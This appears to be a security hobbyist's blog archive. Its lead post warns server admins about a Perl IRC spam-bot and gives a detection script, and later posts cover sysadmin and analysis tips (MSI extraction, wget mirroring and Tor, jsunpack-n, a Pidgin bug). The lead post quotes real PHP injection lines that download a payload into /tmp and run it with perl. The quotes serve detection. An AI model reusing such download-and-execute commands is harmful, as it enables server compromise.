“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently You may have seen strange input in Your server logs…

Something like:

<?php system("wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

 

What does that mean? Well, first of all, Your server is potentially vulnerable to PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes that run from the /tmp/ folder under the default Apache user. If there are any – You’ve been infected. Take care of it.
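As an added example (not code from the original post), here are the two checks above as POSIX shell functions: one greps access-log lines for the injection pattern shown above, the other filters ps output for web-server-user processes running from /tmp (and, going slightly beyond the post, /var/tmp and /dev/shm). The sample log and ps lines are constructed, with a placeholder download host.

```shell
#!/bin/sh
# Added example (not the post's own code): two defender checks for the
# shellbot described above. Both functions read from stdin, so they work
# on saved logs / saved ps output as well as on a live box.

# Constructed sample data for a stand-alone run (not real log lines;
# the download host is a placeholder).
SAMPLE_LOG='10.0.0.5 - - [02/May/2014:10:00:01 +0000] "GET /index.php?p=<?php system(\"wget http://EXAMPLE.invalid/lol.c -O /tmp/shz;perl /tmp/shz\"); ?> HTTP/1.1" 200 512
10.0.0.6 - - [02/May/2014:10:00:02 +0000] "GET /index.php?p=about HTTP/1.1" 200 1024'
SAMPLE_PS='USER       PID COMMAND
root         1 /sbin/init
apache    2201 /usr/sbin/httpd
apache    2345 perl /tmp/shz
apache    2400 /usr/bin/php /var/www/html/tmp_cleanup.php'

# 1. Flag access-log lines carrying the injection pattern from the post:
#    a PHP system() call, a wget saving into /tmp, or perl started from /tmp.
flag_injection_attempts() {
    grep -iE '<\?php[^>]*system\(|wget[^;]*-O[[:space:]]*/tmp/|perl[[:space:]]+/tmp/'
}

# 2. Flag processes owned by the web-server user ($1, default "apache" as
#    on RHEL/CentOS; www-data on Debian) whose command line points into a
#    world-writable directory. Input is `ps -eo user,pid,args` output.
#    The directory must be a path component (" /tmp/"), so the decoy
#    /var/www/html/tmp_cleanup.php above is not flagged.
flag_tmp_processes() {
    awk -v u="${1:-apache}" '$1 == u && $0 ~ "[ \t]/(tmp|var/tmp|dev/shm)/"'
}

# Helpers returning the hit counts for the sample data.
count_injection_hits() {
    printf '%s\n' "$SAMPLE_LOG" | flag_injection_attempts | wc -l | tr -d ' '
}
count_tmp_processes() {
    printf '%s\n' "$SAMPLE_PS" | flag_tmp_processes apache | wc -l | tr -d ' '
}

# Live usage on a RHEL/CentOS box (paths are the distro defaults):
#   flag_injection_attempts < /var/log/httpd/access_log
#   ps -eo user,pid,args | flag_tmp_processes apache
```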

Now, what exactly does this stuff look like?

Header:

 

[image: header]

VT sample, in case You are curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s an IRC server-oriented bot whose main capability is spamming. The language looks like Portuguese – Brazilian?

It has also been seen in the wild since 2012 at least, Google says 🙂 But older versions had less functionality. And now it’s back 🙂

That’s how it behaves:

1. The script connects to an IRC server protected with credentials [unfortunately, it is not available now]

2. It fetches lists of e-mail addresses, names and reply addresses from embedded URLs, composes the mail messages and sends them on behalf of the Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and execution

And, since fun is everything in malware hunting:

One of the functions:

[image: func]

🙂 he\she is so excited 🙂

It’s not a new player on this game field, but recently he\she is back in business, so please be aware.

Well, review Your logs and\or update me in case You have some additional info.

Stay safe

D.L.


Extract MSI in Linux\Windows

2012.08.05

If You have an MSI file, it’s some sort of archive that Microsoft Installer uses to pack installation files.
To analyze it, You need to extract them.
Under Windows, in the command line You run:
msiexec /a PathToSourceMSI /qb TARGETDIR=DirectoryToStoreExtractedFiles

Under *nix systems:
1. Rename file.msi to file.msi.zip
2. Extract it as a regular zip, or use the 7zip unpacker.


Local copy of Directory Listing with wget

2012.07.26

Well, sometimes You need to get a local copy (or not local :) ) of some folders with Directory Listing enabled. It usually looks like a basic webpage with “Index of …” in the title.

For each folder that is mirrored, wget creates multiple copies of the dynamically generated Index page:

index.html 
index.html?C=D;O=A 
index.html?C=D;O=D 
index.html?C=M;O=A 
index.html?C=M;O=D 
index.html?C=N;O=A 
etc... 

Annoying: a lot of useless requests to the server (which is already overloaded by Your good will), and Your local copy is not nice to look at.
Didn’t find a simple solution on Google, so here is mine:

 wget -r -p -np -e robots=off -U mozilla -R index.html* http://website/file_archive/ 

Explanation:
-r - recursive
-p - get all page requisites
-np - don’t ascend to the parent directory
-e robots=off - don't care about what robots.txt says
-U mozilla - I am Mozilla! :))
-R index.html* - reject files index.html* (dangerous if the subfolders contain real index.html files, but I am talking about archives)
Have fun, and try to respect those whose sites You dump.


VirtualBox & VMware on linux error – no source

2012.06.24

Well, sometimes things just stop working.

VirtualBox – an error about modules not running + a request to run, as root:

 /etc/init.d/vboxdrv setup 

Well, Google will in 99% of places recommend You to

# yum install gcc kernel-devel kernel-headers

And it helps... But if not?
Then it is recommended to define KERNEL_DIR=
Well, sometimes it helps too, but what if not?

Well, let's cut here...
Here is what I found as an additional problem on RHEL & CentOS (& Fedora).
Nothing helps?

$ uname -a

Does Your kernel have .PAE?
If yes - then as root:

# yum install kernel-PAE-devel

and then

# /etc/init.d/vboxdrv setup 
Done.

wget thru tor network – how to? Easy!

2012.06.05

Looks like a common task – run wget via Tor. No? Just me?
Apparently, when You google it, it sends You to forums, man pages, or whatever workarounds possible, because wget doesn’t support SOCKS proxies natively, and Tor is not an HTTP\HTTPS proxy.
As a matter of fact, it’s easy 🙂
We’ll need tor and proxychains to accomplish our goal.

1. Add the Tor repository if You have not done this yet:

https://www.torproject.org/docs/rpms.html.en

2. Then install tor and proxychains
$ sudo yum install tor proxychains

3. Start tor service
$ sudo service tor start

4. Check that the proxychains config contains the proper line for forwarding data to the Tor network
$ sudo nano /etc/proxychains.conf
At the bottom, verify that this line is present; if not – add it.
socks4  127.0.0.1 9050

5. Test the config:
$ proxychains wget http://whoer.net/extended

and open the extended page in any HTML viewer, check what IP was logged. 🙂
Working.


Install jsunpack-n on Fedora\RHEL

2012.05.22

Suddenly, one day jsunpack.jeek.org became unavailable due to some internal error, and I had a few samples to decrypt.
So – Google found the jsunpack-n project for me.

Well, nice one, but as usual the installation instructions are written for Ubuntu (mainstream 🙂 )

Here is a small guide for those who need to use this awesome tool under Fedora\RHEL or even CentOS (not tested, update me if You did).

After You have all the files in the jsunpack-n folder, go and open the INSTALL file, written by Blake Hartstein. I will refer to this INSTALL file each time we can proceed with the original install instructions.

1. Let’s install all packages required for successful compilation

# yum install libpcap-devel pkgconfig python-devel gtk2-devel libnet-devel  pcre-devel pcre gcc-c++ gcc

2. Good. Now we need to install libnids-1.24 (or – at least configure and make it) from the folder depends/pynids-0.6.1/libnids-1.24

$ cd depends/pynids-0.6.1/libnids-1.24

$ ./configure

$ make

# make install

p.s. If You install libnids from Your repositories instead, pynids-0.6.1 will fail to set itself up – error:

gcc: error: libnids-1.24/src/libnids.a: No such file or directory

3. Install dependencies, as mentioned in INSTALL file, one by one.

4. Try to run

$ python jsunpackn.py  -u http://google.com

5. See the result in temp/files

Known issues:

1. Yara error

In case You get the message ImportError: libyara.so.0: when running jsunpackn.py, run the following commands:

# echo "/usr/local/lib" >> /etc/ld.so.conf
# ldconfig

2. LZW error

In case You have the error ImportError: No module named lzw when running jsunpackn.py:

Go to website http://pypi.python.org/pypi/lzw/

Download, unpack and install the LZW package:

$ cd lzw-0.01.11/
$ python setup.py build
# python setup.py install

Cheers!

Pidgin & OTR DBUS vuln – plain text access to messages

2012.02.25

Today Dimitris Glynos released a bug that affects my favorite IM client, Pidgin with the OTR plugin.
It requires user-level access for the attacker to listen to the victim’s DBUS messaging.

The interesting fact is that the vuln was reported to the development team about 2 months ago, and there has been no update since…

Does it mean that Pidgin development is finished?

upd1: You can try to reinstall pidgin from the tarball with the --disable-dbus option in the ./configure script, or wait for a solution from the developers.

 
